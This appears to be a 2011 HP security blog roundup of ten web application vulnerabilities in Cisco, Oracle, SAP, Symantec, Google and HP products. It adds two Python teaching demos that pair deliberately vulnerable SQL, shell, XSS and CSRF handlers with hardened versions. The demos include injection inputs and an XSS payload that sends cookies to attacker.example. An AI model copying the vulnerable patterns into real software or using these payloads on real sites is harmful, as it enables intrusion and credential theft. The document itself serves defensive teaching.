Top 10 Web Application Vulnerabilities 07/15/11 - 08/14/11

1) Cisco SA 500 Series Appliances Web Management Interface Remote Command Injection/SQL Injection Vulnerabilities

Cisco SA 500 series security appliances are susceptible to a Remote Command Injection vulnerability and a SQL Injection vulnerability in the web management interface. The Remote Command Injection vulnerability can be exploited to run arbitrary commands with root-level privileges on the underlying operating system, while the SQL Injection vulnerability can give an attacker full access to the backend database and, in certain circumstances, can be used to take complete control of the system. Both vulnerabilities require authentication to be exploited successfully. Updates which resolve these issues are available. Contact the vendor for further details.

http://www.securityfocus.com/bid/48810
http://www.securityfocus.com/bid/48812

2) Oracle Secure Backup 'validate_login' Command Injection Remote Code Execution Vulnerability

Oracle Secure Backup is susceptible to a Remote Command Injection vulnerability. Successful exploitation gives an attacker the means to execute arbitrary code in the context of the web server process, while failed attempts will likely result in a Denial-of-Service condition. Updates which resolve this vulnerability are available. Contact the vendor for more information.

http://www.securityfocus.com/bid/48752

3) SAP Netweaver Invoker Servlet Remote Code Execution Vulnerability

SAP Netweaver is susceptible to a Remote Code Execution vulnerability. An attacker can leverage this to execute arbitrary code in the context of the vulnerable application. Updates which resolve this issue are available. Contact the vendor for additional information.

http://www.securityfocus.com/bid/48925

4) Symantec Web Gateway Management GUI 'forget.php' SQL Injection Vulnerability

Symantec Web Gateway is susceptible to a SQL Injection vulnerability. Successful exploitation could give an attacker the means to read or modify backend database contents, or in some circumstances could be used to take control of the server hosting the database. Updates which resolve this vulnerability are available. Contact the vendor for more details.

http://www.securityfocus.com/bid/48318

5) Oracle GlassFish Enterprise Server Multiple Input Validation Vulnerabilities

Oracle GlassFish Enterprise Server is susceptible to multiple vulnerabilities, including Cross-Site Scripting and HTML Injection. Successful exploitation of these vulnerabilities could be used to alter how the site appears, steal authentication credentials, or execute malicious script code in the browsers of unsuspecting users. Updates which resolve these vulnerabilities are available. Contact the vendor for further details.

http://www.securityfocus.com/bid/48797

6) SAP Netweaver Information Disclosure/Cross-Site Scripting Vulnerabilities

SAP Netweaver is susceptible to multiple vulnerabilities, including Information Disclosure and Cross-Site Scripting. Successful exploitation would give an attacker unauthorized access to sensitive information, the means to execute script code in the browser of an unsuspecting user, and the ability to steal cookie-based authentication credentials. Updates which resolve these vulnerabilities are available. Contact the vendor for more information.

http://www.securityfocus.com/bid/48718

7) HP Network Automation SQL Injection/Cross-Site Scripting Vulnerabilities

HP Network Automation is susceptible to SQL Injection and Cross-Site Scripting vulnerabilities. If exploited, these vulnerabilities could lead to compromise of the application, theft of confidential information and authentication credentials, or execution of malicious script code in the browsers of unsuspecting users. Updates which resolve these issues are available. Contact the vendor for additional information.

http://www.securityfocus.com/bid/48924
http://www.securityfocus.com/bid/48922
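The injection entries above (items 1, 2, 4 and 7) come down to the same two coding patterns: untrusted input concatenated into a SQL statement, or into a shell command line. The Python example below is added here to illustrate those two patterns next to their fixes. It is not code from any of the affected products; the user table, the "diagnostic" endpoint (with echo standing in for a tool such as ping so it runs anywhere with a POSIX shell), the hostname allow-list and the inputs are all constructed for the demonstration.

```python
import re
import sqlite3
import subprocess


def make_db():
    """Constructed in-memory user table standing in for a product's backend database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cret", "root"), ("guest", "guest", "user")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """SQL injection: the statement is assembled by string formatting, so a
    quote plus a comment marker in the input rewrites the WHERE clause."""
    sql = "SELECT role FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, name, password):
    """Parameterised statement: the driver passes the values as data, so an
    embedded quote or comment marker is compared literally, never parsed."""
    row = conn.execute(
        "SELECT role FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchone()
    return row[0] if row else None


# Allow-list for the diagnostic target (assumption for this demo): a hostname or
# IPv4 literal. Requiring a leading alphanumeric also blocks option injection
# such as "-f", which an argv list alone would pass through to the tool.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def diag_vulnerable(target):
    """Command injection: the target is pasted into a shell command line
    (shell=True, POSIX sh), so ';' lets the caller append a second command."""
    cmd = "echo pinging " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def diag_hardened(target):
    """Reject anything that is not a plausible host, then hand the tool an argv
    list so no shell ever parses the input."""
    if not HOST_RE.fullmatch(target):
        raise ValueError("invalid target: %r" % target)
    out = subprocess.run(["echo", "pinging", target], capture_output=True, text=True)
    return out.stdout


def run_demo():
    """Exercise each variant with a benign and a malicious input."""
    conn = make_db()
    sqli = "admin' --"                  # comments out the password check
    cmdi = "127.0.0.1; echo INJECTED"   # appends a second shell command
    try:
        diag_hardened(cmdi)
        hardened_diag_rejected = False
    except ValueError:
        hardened_diag_rejected = True
    return {
        "vuln_login_bypass": login_vulnerable(conn, sqli, "wrong"),
        "hard_login_bypass": login_hardened(conn, sqli, "wrong"),
        "hard_login_valid": login_hardened(conn, "admin", "s3cret"),
        "vuln_diag_output": diag_vulnerable(cmdi),
        "hard_diag_output": diag_hardened("127.0.0.1"),
        "hard_diag_rejected": hardened_diag_rejected,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "=>", repr(value))
```

Running it shows the vulnerable login returning the admin role for a password of "wrong", and the vulnerable diagnostic printing a second line that the appended command produced; the hardened versions return no row and raise on the malformed target. The root-level impact described for the Cisco appliance is what you get when the process running the diagnostic is itself root, which is why argv construction and input validation matter even behind an authenticated interface.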

8) Symantec Endpoint Protection Cross-Site Request Forgery/Cross-Site Scripting Vulnerabilities

Symantec Endpoint Protection is susceptible to multiple vulnerabilities, including Cross-Site Request Forgery and Cross-Site Scripting. If exploited, these vulnerabilities could lead to theft of confidential information and authentication credentials, execution of malicious script code in the browsers of unsuspecting users, or abuse of the trust a web application places in an authenticated user. Updates which resolve these vulnerabilities are available. Contact the vendor for further details.

http://www.securityfocus.com/bid/49101
http://www.securityfocus.com/bid/48231

9) Google Search Appliance Cross-Site Scripting Vulnerability

Google Search Appliance is susceptible to a Cross-Site Scripting vulnerability. If it is successfully exploited, arbitrary script code can be executed in the context of the affected site in the browsers of unsuspecting users. Updates which resolve this vulnerability are available. Contact the vendor for more information.

http://www.securityfocus.com/bid/48957

10) HP Arcsight Connector Appliance Cross-Site Scripting Vulnerability

HP Arcsight Connector Appliance is susceptible to a Cross-Site Scripting vulnerability. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that are mistaken for those of a valid user, compromise confidential information, or execute malicious script code on end-user systems. Updates which resolve this vulnerability are available. Contact the vendor for additional information.

http://www.securityfocus.com/bid/48694
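Items 5, 6, 8, 9 and 10 above are the two client-side classes in this list: Cross-Site Scripting, where the server copies untrusted text into a page, and Cross-Site Request Forgery, where a state-changing request is accepted on the strength of the session cookie alone. The Python example below is added here to show the weak and the corrected handling for each, side by side. It is not code from any of the listed products; the page template, the session identifiers, the form fields and the server secret are constructed for the demonstration.

```python
import hashlib
import hmac
import html
import secrets

# Server-side key that binds CSRF tokens to a session. Assumption for this demo:
# in a real deployment it comes from configuration, not from source.
_CSRF_KEY = secrets.token_bytes(32)


def render_vulnerable(query):
    """Reflected XSS: the search string is copied into the page verbatim, so
    markup in the query becomes markup in the victim's browser."""
    return "<p>Results for: %s</p>" % query


def render_hardened(query):
    """Output encoding for an HTML text node (quote=True also covers attribute
    values): '<', '>', '&' and quotes reach the browser as entities."""
    return "<p>Results for: %s</p>" % html.escape(query, quote=True)


def issue_csrf_token(session_id):
    """Token = HMAC(secret, session id): a third-party site cannot compute it,
    and it is only valid for the session it was issued to."""
    return hmac.new(_CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf(session_id, token):
    """Constant-time comparison against the token expected for this session."""
    if not token:
        return False
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected.encode(), token.encode())


def change_password_vulnerable(session_id, form):
    """CSRF: a cookie-authenticated POST is accepted from anywhere. The browser
    attaches the session cookie even when the form was submitted by another
    site, so the request cannot be distinguished from the user's own."""
    if not session_id:
        return "unauthenticated"
    return "changed"


def change_password_hardened(session_id, form):
    """Same handler, but it also requires the session-bound token that only the
    genuine page could have embedded in the form."""
    if not session_id:
        return "unauthenticated"
    if not check_csrf(session_id, form.get("csrf", "")):
        return "rejected"
    return "changed"


def run_demo():
    """Constructed inputs: an XSS payload that exfiltrates the cookie, and a
    password-change POST as an attacker's page would submit it (no token)."""
    payload = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
    forged = {"new_password": "owned"}                  # cross-site form, no token
    genuine = {"new_password": "owned", "csrf": issue_csrf_token("sess-1")}
    return {
        "vuln_page_has_script": "<script>" in render_vulnerable(payload),
        "hard_page_has_script": "<script>" in render_hardened(payload),
        "vuln_forged_post": change_password_vulnerable("sess-1", forged),
        "hard_forged_post": change_password_hardened("sess-1", forged),
        "hard_genuine_post": change_password_hardened("sess-1", genuine),
        "token_other_session": check_csrf("sess-2", issue_csrf_token("sess-1")),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "=>", repr(value))
```

The two defences are independent: encoding stops the stolen-cookie outcome listed under items 6 and 10, while the token stops the "requests mistaken for those of a valid user" outcome, and a site with an XSS flaw can still have its CSRF token read by injected script, which is why both classes appear together in the Symantec and HP entries above.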

The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation.